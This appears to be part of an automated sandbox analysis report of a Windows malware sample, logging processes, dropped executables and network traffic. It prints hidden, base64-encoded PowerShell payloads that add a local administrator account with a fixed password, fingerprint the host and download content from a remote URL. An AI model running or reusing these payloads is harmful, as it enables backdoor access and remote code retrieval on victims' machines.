        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGJump to behavior
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline"Jump to behavior
        Source: svczHost.exe.9.drStatic PE information: section name: .managed
        Source: svczHost.exe.9.drStatic PE information: section name: hydrated
        Source: myRdpService.exe.16.drStatic PE information: section name: .managed
        Source: myRdpService.exe.16.drStatic PE information: section name: hydrated
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFC455055CB push eax; iretd 1_2_00007FFC4550560D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFC45507C9E push eax; retf 1_2_00007FFC45507CAD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFC4550786E pushad ; iretd 1_2_00007FFC4550789D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFC454F50A3 push eax; retf 1_2_00007FFC454F50B1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFC4550789E push eax; iretd 1_2_00007FFC455078AD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFC454FE96A push ebx; retn 0009h1_2_00007FFC454FE99A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFC45507C6E pushad ; retf 1_2_00007FFC45507C9D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFC454F2315 pushad ; iretd 1_2_00007FFC454F232D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFC453CD2A5 pushad ; iretd 5_2_00007FFC453CD2A6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFC453CD2A5 pushad ; iretd 9_2_00007FFC453CD2A6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFC454E75D9 push ebx; iretd 9_2_00007FFC454E75DA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFC454E819B push ebx; ret 9_2_00007FFC454E81DA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFC454E8198 push ebx; ret 9_2_00007FFC454E81DA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFC455B4D3A push esi; iretd 9_2_00007FFC455B4D3C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFC454F9357 push esp; retf 20_2_00007FFC454F9358
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFC454F2B1D push E83B0B49h; ret 20_2_00007FFC454F2B69
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 51_2_00007FFC4550161D push E95A6D01h; ret 51_2_00007FFC45501639
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 51_2_00007FFC455022F0 pushad ; iretd 51_2_00007FFC4550232D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\svczHost.exeJump to dropped file
        Source: C:\Windows\Temp\svczHost.exeFile created: C:\Windows\Temp\myRdpService.exeJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\svczHost.exeJump to dropped file
        Source: C:\Windows\Temp\svczHost.exeFile created: C:\Windows\Temp\myRdpService.exeJump to dropped file
        Source: C:\Windows\Temp\myRdpService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 8000
        Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 8000
        Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49764
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 8000
        Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49765
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
